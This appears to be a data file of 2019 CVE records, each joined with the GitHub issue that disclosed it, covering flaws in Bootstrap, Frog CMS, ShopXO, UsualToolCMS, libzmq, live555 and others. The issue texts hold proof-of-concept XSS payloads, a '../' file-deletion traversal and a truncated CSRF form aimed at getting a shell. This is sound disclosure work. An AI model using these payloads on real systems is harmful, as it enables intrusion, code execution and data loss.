{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/twbs/bootstrap/issues/27044 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"twbs",
"bootstrap"
] | found in bootstrap 3.3.7
`<a href="#" data-toggle="tooltip" data-viewport="<img src=1 onerror=alert(123) />" title="Hooray!">Hover over me</a>`
https://jsbin.com/qipirurise/edit?html,output
Win 7 x64
Chrome 67.0.3396.99
Firefox 61.0.1 (64-Bit) | tooltip - XSS on data-viewport attribute | https://api.github.com/repos/twbs/bootstrap/issues/27044/comments | 0 | 2018-08-10T09:04:03Z | 2018-08-13T16:10:06Z | https://github.com/twbs/bootstrap/issues/27044 | 349,433,528 | 27,044 | 20 |
CVE-2018-20676 | 2019-01-09T05:29:01.287 | In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/twbs/bootstrap/issues/27915#issuecomment-452196628 | [
"Third Party Advisory"
] | github.com | [
"twbs",
"bootstrap"
] | Github considers Bootstrap 3.4.0 an insecure dependency via its [security vulnerability alerts tool](https://help.github.com/articles/about-security-alerts-for-vulnerable-dependencies). It points to the [NVD CVE-2018-14041](https://nvd.nist.gov/vuln/detail/CVE-2018-14041) page, which shows that only >4.1.2 is secure. I... | Github considers bootstrap 3.4.0 as insecure | https://api.github.com/repos/twbs/bootstrap/issues/27915/comments | 19 | 2018-12-23T16:23:10Z | 2019-02-04T07:45:21Z | https://github.com/twbs/bootstrap/issues/27915 | 393,762,774 | 27,915 | 21 |
CVE-2018-20677 | 2019-01-09T05:29:01.397 | In Bootstrap before 3.4.0, XSS is possible in the affix configuration target property. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1076"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.redhat.com/errata/RHBA-2019:1570"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://access.... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:getbootstrap:bootstrap:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C5E9597E-65BB-4E8A-B0E8-467D2903511B",
"versionEndExcluding": "3.4.0",
"versionEndIncluding": null,
"versionStart... | [
"79"
] | 79 | https://github.com/twbs/bootstrap/issues/27045 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"twbs",
"bootstrap"
] | found in bootstrap 3.3.7
`$('.js-affixed-element-top').affix({
offset: {
top: $('.js-page-header').outerHeight(true) - 10
, bottom: $('.js-footer').outerHeight(true) + 10
},
target: '<img src=x onerror=alert(0)>'
})`
https://jsbin.com/palokaxina/edit?html,output
Win 7 x64
Chrome ... | affix - XSS on target config | https://api.github.com/repos/twbs/bootstrap/issues/27045/comments | 0 | 2018-08-10T09:07:08Z | 2018-08-13T16:10:22Z | https://github.com/twbs/bootstrap/issues/27045 | 349,434,502 | 27,045 | 22 |
CVE-2018-20680 | 2019-01-09T17:29:00.247 | Frog CMS 0.9.5 has XSS in the admin/?/page/edit/1 body field. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/philippe/FrogCMS/issues/22"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Pa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:frog_cms_project:frog_cms:0.9.5:*:*:*:*:*:*:*",
"matchCriteriaId": "BC916FD5-B582-4EC0-AD00-BD72FCF82BF3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"79"
] | 79 | https://github.com/philippe/FrogCMS/issues/22 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"philippe",
"FrogCMS"
] | ## Frog CMS 0.9.5 has xss in /FrogCMS/admin/?/page/edit/1 body field
### 1.login
### 2.Input exp `<img src=1 onerror=alert(/du/)>`

### 3.save and close
### 4.open http://127.0.0.1/FrogCMS/index.php
![ima... | Frog CMS 0.9.5 has xss in /FrogCMS/admin/?/page/edit/1 body field | https://api.github.com/repos/philippe/FrogCMS/issues/22/comments | 0 | 2018-12-31T07:53:42Z | 2018-12-31T07:53:42Z | https://github.com/philippe/FrogCMS/issues/22 | 394,943,057 | 22 | 23 |
CVE-2018-20681 | 2019-01-09T23:29:05.230 | mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.6,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mate-desktop/mate-screensaver/issues/152"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0",
"versionEndExcluding": "1.20.2",
"versionEndIncluding": null,
"vers... | [
"200"
] | 200 | https://github.com/mate-desktop/mate-screensaver/issues/152 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"mate-desktop",
"mate-screensaver"
] | #### Expected behaviour
mate-screensaver should keep the user's session locked until valid authentication has taken place (password entered, etc.)
#### Actual behaviour & steps to reproduce the behaviour
Do the following:
1. Have two display-port attached displays on a fresh install of Fedora 27. Mine are in por... | mate-screensaver does not maintain user lockout / screen lock under certain conditions | https://api.github.com/repos/mate-desktop/mate-screensaver/issues/152/comments | 9 | 2018-04-10T19:53:17Z | 2019-01-10T14:04:12Z | https://github.com/mate-desktop/mate-screensaver/issues/152 | 313,066,344 | 152 | 24 |
CVE-2018-20681 | 2019-01-09T23:29:05.230 | mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.6,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mate-desktop/mate-screensaver/issues/152"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0",
"versionEndExcluding": "1.20.2",
"versionEndIncluding": null,
"vers... | [
"200"
] | 200 | https://github.com/mate-desktop/mate-screensaver/issues/155 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mate-desktop",
"mate-screensaver"
] | #### Expected behaviour
Lock Screen
Turn off monitor (either by power management putting it to sleep, or by pressing power button)
Turn monitor on
Start typing
Expect to see lock screen on monitor
#### Actual behaviour
Lock Screen
Turn off monitor
Turn monitor on
Start typing
Expect to see lock screen on m... | mate-screensaver screen lock can be bypassed by power cycling monitor [$110] | https://api.github.com/repos/mate-desktop/mate-screensaver/issues/155/comments | 60 | 2018-05-01T20:44:51Z | 2021-07-21T13:48:18Z | https://github.com/mate-desktop/mate-screensaver/issues/155 | 319,321,909 | 155 | 25 |
CVE-2018-20681 | 2019-01-09T23:29:05.230 | mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices (such as additionally attached graphical outputs via HDMI, VGA, DVI, etc.) the content of a sc... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 3.6,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/mate-desktop/mate-screensaver/issues/152"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mate-desktop:mate-screensaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "795C0DDF-0421-4B68-9B1D-E054518D0BF0",
"versionEndExcluding": "1.20.2",
"versionEndIncluding": null,
"vers... | [
"200"
] | 200 | https://github.com/mate-desktop/mate-screensaver/issues/170 | [
"Third Party Advisory"
] | github.com | [
"mate-desktop",
"mate-screensaver"
] | #### Expected behaviour
When plug / unplug a monitor, Lock Screen should work like before
#### Actual behaviour
When plug / unplug a monitor, Lock Screen does not work unless I restart mate-screensaver
#### Steps to reproduce the behaviour
- Login to MATE with a laptop while external monitor is attached via ... | Lock Screen not working after monitor plugged / unplugged (need to restart mate-screensaver) | https://api.github.com/repos/mate-desktop/mate-screensaver/issues/170/comments | 5 | 2018-09-14T04:52:26Z | 2019-04-25T14:45:47Z | https://github.com/mate-desktop/mate-screensaver/issues/170 | 360,155,930 | 170 | 26 |
CVE-2019-5887 | 2019-01-10T14:29:00.243 | An issue was discovered in ShopXO 1.2.0. In the UnlinkDir method of the FileUtil.php file, the input parameters are not checked, resulting in input mishandling by the rmdir method. Attackers can delete arbitrary files by using "../" directory traversal. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/gongfuxiang/shopxo/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:shopxo:shopxo:1.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "3AD3B139-3799-4449-A2A9-6AC6860F732D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"22"
] | 22 | https://github.com/gongfuxiang/shopxo/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"gongfuxiang",
"shopxo"
] | 后台删除文件处由于没有对文件名做校验导致可以通过../进行回溯来删除任意文件夹,删除install文件(锁文件所在的文件夹)时,可以重装系统
在Appminialipaylist.php文件中,params是受控制的:

进入delete方法中,当不是zip结尾时会认为是文件夹
 that it is possible to inject JavaScript into Bodhi's web interface through Bugzilla ticket subjects. The reporter cited [an update](https://bodhi.fedoraproject.org/updates/FEDORA-2017-3c92db10b8) that did not properly escape tags from the bug it wa... | CVE-2017-1002152: JavaScript injection via Bugzilla ticket subjects | https://api.github.com/repos/fedora-infra/bodhi/issues/1740/comments | 1 | 2017-08-10T15:53:09Z | 2017-08-15T21:20:57Z | https://github.com/fedora-infra/bodhi/issues/1740 | 249,394,149 | 1,740 | 29 |
CVE-2019-6129 | 2019-01-11T05:29:01.640 | png_create_info_struct in png.c in libpng 1.6.36 has a memory leak, as demonstrated by pngcp. NOTE: a third party has stated "I don't think it is libpng's job to free this buffer. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/glennrp/libpng/issues/269"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libpng:libpng:1.6.36:*:*:*:*:*:*:*",
"matchCriteriaId": "F9E98605-E9D5-4A8A-8858-C4AF1236AB6D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludi... | [
"401"
] | 401 | https://github.com/glennrp/libpng/issues/269 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"glennrp",
"libpng"
] | Hi,libpng team. there is a memory leak in the file png.c:368 of function png_create_info_struct.
the bug is trigered by `./pngcp poc /dev/null`
[libpng_poc.zip](https://github.com/glennrp/libpng/files/2729282/libpng_poc.zip)
the asan debug info is as follows:
===========================================... | memory leak in png_create_info_struct | https://api.github.com/repos/pnggroup/libpng/issues/269/comments | 13 | 2019-01-05T07:23:28Z | 2023-01-08T15:27:24Z | https://github.com/pnggroup/libpng/issues/269 | 396,141,975 | 269 | 30 |
CVE-2019-6132 | 2019-01-11T05:29:01.763 | An issue was discovered in Bento4 v1.5.1-627. There is a memory leak in AP4_DescriptorFactory::CreateDescriptorFromStream in Core/Ap4DescriptorFactory.cpp when called from the AP4_EsdsAtom class in Core/Ap4EsdsAtom.cpp, as demonstrated by mp42aac. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/357"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https:... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1-627:*:*:*:*:*:*:*",
"matchCriteriaId": "F87642DF-B939-4195-A2AE-F0F1D39CD16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExc... | [
"401"
] | 401 | https://github.com/axiomatic-systems/Bento4/issues/357 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | there is memory leaks in Ap4String.cpp
./mp42aac poc /dev/null
=================================================================
==15810==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 96 byte(s) in 1 object(s) allocated from:
#0 0x522860 in operator new(unsigned long) (/root/apps/Bento4... | memory leaks in Ap4String.cpp | https://api.github.com/repos/axiomatic-systems/Bento4/issues/357/comments | 1 | 2019-01-10T17:00:31Z | 2019-01-12T09:36:13Z | https://github.com/axiomatic-systems/Bento4/issues/357 | 397,925,621 | 357 | 31 |
CVE-2019-6135 | 2019-01-11T17:29:00.273 | An issue has been found in libIEC61850 v1.3.1. Memory_malloc in hal/memory/lib_memory.c has a memory leak when called from Asn1PrimitiveValue_create in mms/asn1/asn1_ber_primitive_value.c, as demonstrated by goose_publisher_example.c and iec61850_9_2_LE_example.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automation/libiec61850/issues/103"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"401"
] | 401 | https://github.com/mz-automation/libiec61850/issues/103 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mz-automation",
"libiec61850"
] | Hi team,
Their are multiple memory leaks in `mms_mapping.c` and `mms_value.c`
Snip **[mms_value.c](https://github.com/mz-automation/libiec61850/blob/v1.3/src/mms/iso_mms/common/mms_value.c#L1583-L1600)**
```
self->value.visibleString.buf = (char*) GLOBAL_MALLOC(size + 1);
if (self->value.visibleStri... | Memory leaks in mms_mapping.c & mms_value.c | https://api.github.com/repos/mz-automation/libiec61850/issues/103/comments | 2 | 2019-01-11T10:26:24Z | 2019-03-25T22:33:21Z | https://github.com/mz-automation/libiec61850/issues/103 | 398,225,876 | 103 | 32 |
CVE-2019-6135 | 2019-01-11T17:29:00.273 | An issue has been found in libIEC61850 v1.3.1. Memory_malloc in hal/memory/lib_memory.c has a memory leak when called from Asn1PrimitiveValue_create in mms/asn1/asn1_ber_primitive_value.c, as demonstrated by goose_publisher_example.c and iec61850_9_2_LE_example.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automation/libiec61850/issues/103"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automa... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:libiec61850:1.3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A3197989-9E64-49DA-875C-7EF8A7697B1B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionS... | [
"401"
] | 401 | https://github.com/mz-automation/libiec61850/issues/104 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mz-automation",
"libiec61850"
] | Hi team,
Their are multiple memory leaks in `goose_publisher_example.c`
Snip **[goose_publisher_example.c](https://github.com/mz-automation/libiec61850/blob/v1.3/examples/goose_publisher/goose_publisher_example.c#L30)**
```
LinkedList_add(dataSetValues, MmsValue_newIntegerFromInt32(1234));
LinkedList_add(da... | Memeory leak in goose_publisher_example.c | https://api.github.com/repos/mz-automation/libiec61850/issues/104/comments | 2 | 2019-01-11T12:32:48Z | 2019-03-25T22:25:41Z | https://github.com/mz-automation/libiec61850/issues/104 | 398,270,546 | 104 | 33 |
CVE-2019-6137 | 2019-01-11T17:29:00.383 | An issue was discovered in lib60870 2.1.1. LinkLayer_setAddress in link_layer/link_layer.c has a NULL pointer dereference. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/mz-automation/lib60870/issues/39"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://g... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mz-automation:lib60870:2.1.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D248DC3D-FB81-4C1E-9AA2-34C6A940CFBD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStar... | [
"476"
] | 476 | https://github.com/mz-automation/lib60870/issues/39 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"mz-automation",
"lib60870"
] | Hi team,
There is a NULL pointer dereference in `link_layer.c`
Snip **[link_layer.c](https://github.com/mz-automation/lib60870/blob/master/lib60870-C/src/iec60870/link_layer/link_layer.c#L142)**
```
LinkLayer_setAddress(LinkLayer self, int address)
{
self->address = address;
}
```
## Stack-trace
``... | NULL pointer dereference in link_layer.c | https://api.github.com/repos/mz-automation/lib60870/issues/39/comments | 3 | 2019-01-11T12:49:26Z | 2019-02-19T20:19:14Z | https://github.com/mz-automation/lib60870/issues/39 | 398,275,787 | 39 | 34 |
CVE-2019-6244 | 2019-01-12T02:29:00.357 | An issue was discovered in UsualToolCMS 8.0. cmsadmin/a_sqlbackx.php?t=sql allows CSRF attacks that can execute SQL statements, and consequently execute arbitrary PHP code by writing that code into a .php file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/fdbao/UsualToolCMS/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:usualtool:usualtoolcms:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FEAAD3B3-D0DF-4FED-938B-6F89F59301A3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartE... | [
"352"
] | 352 | https://github.com/fdbao/UsualToolCMS/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"fdbao",
"UsualToolCMS"
] | If you want to use the vulnerability, you need to have the MySQL operation rights
First, generating CSRF POC and inserting a line of data containing PHP malicious codes into CMS_water
```
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/usualToolCMS/cmsadmin/a_sql... | usualToolCMS CSRF getshell | https://api.github.com/repos/fdbao/UsualToolCMS/issues/1/comments | 0 | 2019-01-09T08:28:22Z | 2019-01-09T08:30:27Z | https://github.com/fdbao/UsualToolCMS/issues/1 | 397,260,318 | 1 | 35 |
CVE-2019-6245 | 2019-01-13T00:29:00.477 | An issue was discovered in Anti-Grain Geometry (AGG) 2.4 as used in SVG++ (aka svgpp) 1.2.3. In the function agg::cell_aa::not_equal, dx is assigned to (x2 - x1). If dx >= dx_limit, which is (16384 << poly_subpixel_shift), this function will call itself recursively. There can be a situation where (x2 - x1) is always bi... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/svgpp/svgpp/issues/70"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.or... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:antigrain:agg:2.4:*:*:*:*:*:*:*",
"matchCriteriaId": "5B11FD8B-B7E4-44AD-82BA-397070170963",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding"... | [
"787"
] | 787 | https://github.com/svgpp/svgpp/issues/70 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"svgpp",
"svgpp"
] | ### bug1: an oob-read bug
**description**
A type confusion bug lead to out-of-bound read in src/demo/svgpp_agg_render. buffer.pixfmt() should return a reference to pixfmt_alpha_blend_rgba but instead return some struct that look like a long+string. That is why it crashes when it simply get the member stride. This ... | 4 bugs found in svgpp | https://api.github.com/repos/svgpp/svgpp/issues/70/comments | 2 | 2019-01-12T11:41:38Z | 2019-02-04T19:30:12Z | https://github.com/svgpp/svgpp/issues/70 | 398,546,864 | 70 | 36 |
CVE-2019-6250 | 2019-01-13T15:29:00.547 | A pointer overflow, with code execution, was discovered in ZeroMQ libzmq (aka 0MQ) 4.2.x and 4.3.x before 4.3.1. A v2_decoder.cpp zmq::v2_decoder_t::size_ready integer overflow allows an authenticated attacker to overwrite an arbitrary amount of bytes beyond the bounds of a buffer, which can be leveraged to run arbitra... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/zeromq/libzmq/issues/3351"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/zeromq/libzmq/releases... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zeromq:libzmq:*:*:*:*:*:*:*:*",
"matchCriteriaId": "79DFA925-B69B-4DFB-B33F-8B8AC4A692E3",
"versionEndExcluding": null,
"versionEndIncluding": "4.2.5",
"versionStartExcluding... | [
"190"
] | 190 | https://github.com/zeromq/libzmq/issues/3351 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"zeromq",
"libzmq"
] | # Bug details
In ```src/v2_decoder.cpp zmq::v2_decoder_t::eight_byte_size_ready()```, the attacker can provide an ```uint64_t``` of his choosing:
```cpp
85 int zmq::v2_decoder_t::eight_byte_size_ready (unsigned char const *read_from_)
86 {
87 // The payload size is encoded as 64-bit unsigned integer.
... | Remote code execution vulnerability | https://api.github.com/repos/zeromq/libzmq/issues/3351/comments | 7 | 2019-01-08T14:15:33Z | 2019-01-13T14:47:47Z | https://github.com/zeromq/libzmq/issues/3351 | 396,925,193 | 3,351 | 37 |
CVE-2019-6256 | 2019-01-14T08:29:00.427 | A Denial of Service issue was discovered in the LIVE555 Streaming Media libraries as used in Live555 Media Server 0.93. It can cause an RTSPServer crash in handleHTTPCmd_TunnelingPOST, when RTSP-over-HTTP tunneling is supported, via x-sessioncookie HTTP headers in a GET request and a POST request within the same TCP se... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/rgaufman/live555/issues/19"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-l... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:live555:live555_media_server:0.93:*:*:*:*:*:*:*",
"matchCriteriaId": "948E5448-F51A-4C86-BDC8-947815B725A9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versio... | [
"755"
] | 755 | https://github.com/rgaufman/live555/issues/19 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"rgaufman",
"live555"
] | ISSUE DESCRIPTION
=================
The project website : http://www.live555.com/liveMedia/
I found a new way to make RTSPServer crash in lastest version 0.93 when RTSP-over-HTTP tunneling is supported.
I only need to send two HTTP requests in one TCP connection.
The problem occurrs in RTSPServer.cpp:853 ,... | There is a Denial of service attack issue that can cause program to crash in LIVE555 Media Server version 0.93. | https://api.github.com/repos/rgaufman/live555/issues/19/comments | 3 | 2019-01-14T02:37:30Z | 2019-03-04T09:59:15Z | https://github.com/rgaufman/live555/issues/19 | 398,730,939 | 19 | 38 |
